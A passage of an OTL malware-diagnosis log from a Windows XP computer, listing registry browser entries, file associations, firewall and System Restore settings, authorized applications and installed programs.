[2012/10/16 02:25:00 | 000,090,910 | ---- | M] () -- C:\TDSSKiller.2.8.13.0_16.10.2012_02.24.22_log.txt
[2013/10/20 19:40:51 | 000,129,570 | ---- | M] () -- C:\TDSSKiller.3.0.0.14_20.10.2013_19.39.51_log.txt
[2014/08/18 22:35:16 | 000,147,238 | ---- | M] () -- C:\TDSSKiller.3.0.0.40_18.08.2014_22.33.58_log.txt
[2014/07/22 19:48:13 | 000,145,768 | ---- | M] () -- C:\TDSSKiller.3.0.0.40_22.07.2014_19.46.14_log.txt
 
< %systemroot%\system32\Spool\prtprocs\w32x86\*.dll >
[2008/07/06 06:06:10 | 000,089,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\filterpipelineprintproc.dll
[2009/10/21 15:29:40 | 000,320,512 | ---- | M] (Hewlett-Packard Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\hpfpp101.dll
 
< %systemroot%\*. /mp /s >
 
< %systemroot%\system32\*.dll /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]
 
< %systemroot%\Tasks\*.job /lockedfiles >
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\system32\*.exe /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]
 
< %systemroot%\System32\config\*.sav >
[2006/07/19 12:35:24 | 000,094,208 | ---- | M] () -- C:\WINDOWS\System32\config\default.sav
[2006/07/19 12:35:24 | 000,659,456 | ---- | M] () -- C:\WINDOWS\System32\config\software.sav
[2006/07/19 12:35:24 | 000,901,120 | ---- | M] () -- C:\WINDOWS\System32\config\system.sav
 
< %PROGRAMFILES%\* >
 
< %USERPROFILE%\..|smtmp;true;true;true /FP >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU >
 
< hklm\software\clients\startmenuinternet|command /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/25 16:34:44 | 000,643,312 | ---- | M] (Microsoft Corporation)
 
< hklm\software\clients\startmenuinternet|command /64 /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/08/10 14:29:48 | 000,897,648 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/08/10 14:30:12 | 000,275,568 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/25 16:34:44 | 000,643,312 | ---- | M] (Microsoft Corporation)

< End of report >

 

EXTRAS Log:

OTL Extras logfile created on: 8/29/2014 9:09:26 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Documents and Settings\Jay\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1014.42 Mb Total Physical Memory | 264.36 Mb Available Physical Memory | 26.06% Memory free
2.38 Gb Paging File | 1.77 Gb Available in Paging File | 74.30% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 71.84 Gb Total Space | 31.10 Gb Free Space | 43.29% Space Free | Partition Type: NTFS
Drive D: | 72.31 Gb Total Space | 13.53 Gb Free Space | 18.71% Space Free | Partition Type: FAT32
 
Computer Name: MOLES | User Name: Jay | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Digital Photo Professional] -- C:\Program Files\Canon\Digital Photo Professional\DPP\DPPViewer.exe /path "%1" (CANON INC.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"UPDATESDISABLENOTIFY" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"427:TCP" = 427:TCP:LocalSubNet:Enabled:SLP_Port(427)_TCP
"427:UDP" = 427:UDP:LocalSubNet:Enabled:SLP_Port(427)_UDP
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DisableNotifications" = 1
"DoNotAllowExceptions" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1901:UDP" = 1901:UDP:*:Enabled:Windows Media Format SDK (firefox.exe)
"427:TCP" = 427:TCP:LocalSubNet:Enabled:SLP_Port(427)_TCP
"427:UDP" = 427:UDP:LocalSubNet:Enabled:SLP_Port(427)_UDP
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\system32\sessmgr.exe" = %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019 -- (Microsoft Corporation)
"%windir%\Network Diagnostic\xpnetdiag.exe" = %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000 -- (Microsoft Corporation)
"C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe:*:Enabled:hpqtra08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe:*:Enabled:hpqste08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe:*:Enabled:hpfccopy.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe:*:Enabled:hpiscnapp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe:*:Enabled:hpqgplgtupl.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe:*:Enabled:hpqgpc01.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe:*:Enabled:hpqusgm.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe:*:Enabled:hpqusgh.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\HP Software Update\hpwucli.exe" = C:\Program Files\HP\HP Software Update\hpwucli.exe:*:Enabled:hpwucli.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe" = C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe:*:Enabled:smartwebprintexe.exe -- (Hewlett-Packard Co.)
"E:\setup\hpznui01.exe" = E:\setup\hpznui01.exe:*:Enabled:hpznui01.exe
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\system32\sessmgr.exe" = %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019 -- (Microsoft Corporation)
"%windir%\Network Diagnostic\xpnetdiag.exe" = %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000 -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE" = C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook -- (Microsoft Corporation)
"C:\Program Files\Starcraft\StarCraft.exe" = C:\Program Files\Starcraft\StarCraft.exe:*:Enabled:Starcraft -- (Blizzard Entertainment)
"C:\Program Files\iTunes\iTunes.exe" = C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)
"C:\Program Files\Mozilla Firefox\firefox.exe" = C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Firefox -- (Mozilla Corporation)
"C:\Program Files\Spybot - Search & Destroy\SDUpdate.exe" = C:\Program Files\Spybot - Search & Destroy\SDUpdate.exe:*:Enabled:Updater for Spybot-S&D
"C:\Program Files\Common Files\Java\Java Update\jusched.exe" = C:\Program Files\Common Files\Java\Java Update\jusched.exe:*:Disabled:Java™ Update Scheduler -- (Oracle Corporation)
"C:\Program Files\Common Files\Java\Java Update\jucheck.exe" = C:\Program Files\Common Files\Java\Java Update\jucheck.exe:*:Disabled:Java™ Update Checker -- (Oracle Corporation)
"C:\Program Files\Mozilla Firefox\plugin-container.exe" = C:\Program Files\Mozilla Firefox\plugin-container.exe:*:Enabled:Plugin Container for Firefox -- (Mozilla Corporation)
"C:\Documents and Settings\Jay\My Documents\Downloads\SUPERAntiSpyware.exe" = C:\Documents and Settings\Jay\My Documents\Downloads\SUPERAntiSpyware.exe:*:Enabled:SUPERAntiSpyware Free Edition Setup -- (SUPERAntiSpyware.com)
"C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe" = C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe:*:Enabled:SUPERAntiSpyware Application -- ()
"C:\Program Files\Pandora\Pandora.exe" = C:\Program Files\Pandora\Pandora.exe:*:Enabled:Pandora -- ()
"C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe:*:Enabled:hpqtra08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe:*:Enabled:hpqste08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe:*:Enabled:hpfccopy.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe:*:Enabled:hpiscnapp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe:*:Enabled:hpqgplgtupl.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe:*:Enabled:hpqgpc01.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe:*:Enabled:hpqusgm.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe:*:Enabled:hpqusgh.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\HP Software Update\hpwucli.exe" = C:\Program Files\HP\HP Software Update\hpwucli.exe:*:Enabled:hpwucli.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe" = C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe:*:Enabled:smartwebprintexe.exe -- (Hewlett-Packard Co.)
"C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe" = C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe:*:Enabled:WebKit -- (Apple Inc.)
"C:\Program Files\Bonjour\mDNSResponder.exe" = C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour Service -- (Apple Inc.)
"C:\Program Files\Google\Chrome\Application\chrome.exe" = C:\Program Files\Google\Chrome\Application\chrome.exe:*:Enabled:Google Chrome -- (Google Inc.)
 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0367BC04-ADEA-47A5-9F82-96C161C99B52}" = When Bugs Attack
"{05BDC796-3451-4F81-B91D-E98F7ADA76C2}" = TurboTax 2010 WinPerTaxSupport
"{06A1D88C-E102-4527-AF70-29FFD7AF215A}" = Scan
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{08C5815C-2C6E-44f8-8748-0E61BC9AFB68}" = Symantec KB-DocID:2003093015493306
"{097CDB1E-07C9-40F1-9972-F0F9F3A287E4}" = Network
"{0A3925EA-5B0E-401B-A189-7419149747B2}" = Adobe AIR
"{0CB98AC0-D691-4B21-AD3D-95982517021D}" = Acer WLAN 11g USB Dongle
"{0F6F6876-6334-4977-B5DD-CFC12E193420}" = iTunes
"{1458BB78-1DC5-4BC0-B9A3-2B644F5A8105}" = DeviceDiscovery
"{150B6201-E9E6-4DFB-960E-CCBD53FBDDED}" = HPProductAssistant
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{26A24AE4-039D-4CA4-87B4-2F83217025FF}" = Java 7 Update 25
"{292F0F52-B62D-4E71-921B-89A682402201}" = Toolbox
"{2AB5A6A3-71C3-49EE-A253-759E01512FF8}" = Journey to Stonehenge
"{2F7D5734-056F-4A0A-A1C7-CA1AAE5BB1EB}" = Angry Birds
"{3323D8AC-5821-4A8F-8064-46DE657834CE}" = Frog Frenzy 2
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3782EC09-4000-475E-8A59-9CABD6F03B4C}" = TurboTax 2010 WinPerFedFormset
"{385979FE-DC4F-4140-8EAD-A59625000D72}" = NTI Backup NOW! 4
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{407B9B5C-DAC5-4F44-A756-B57CAB4E6A8B}" = Google Earth
"{42BBA4CC-EFB6-4653-A2CC-F305D4B399C3}" = PS_AIO_07_D110_SW_Min
"{43602F34-1AA3-44FB-AEB2-D08C2C73743F}" = Paint.NET v3.36
"{4998FF95-709A-430A-B104-92A009ABB848}" = QuickConnect
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4AD13F68-CADA-4C6B-9759-C33753F89908}" = Acer eDataSecurity Management
"{4F2FCCCF-29F3-44B9-886F-6D16F8417522}" = TurboTax 2010 wrapper
"{565E7B0E-B76B-4EAD-9753-F1E72A5CF12E}" = HPAppStudio
"{5B025634-7D5B-4B8D-BE2A-7943C1CF2D5D}" = Status
"{5F189DF5-2D05-472B-9091-84D9848AE48B}{19275d4b}" = Browser System Enahncer
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6142632E-6119-4117-AF54-A5366ACEC899}" = TurboTax 2011 wutiper
"{652C4ADF-0A29-4B02-9211-EE61675847DE}" = Canon Camera WIA Driver
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6D10C4BE-0C36-4F4E-8C3A-E5E867A5F01D}" = QuickConnect
"{74BE7519-41A7-45A8-8AA6-78C7907A4808}" = EOS Capture 1.2
"{750CF8D7-4B04-404F-AFA2-14C129C42373}" = EOS Viewer Utility 1.2.1
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7DECB2A6-C226-6042-9C2B-83316950D30E}" = Pandora
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8BBF6DFD-0AD9-43A7-9FBD-BF065E3866AF}" = URGE
"{8EE94FD8-5F52-4463-A340-185D16328158}" = WebReg
"{8FF6F5CA-4E30-4E3B-B951-204CAAA2716A}" = SmartWebPrinting
"{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders  (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
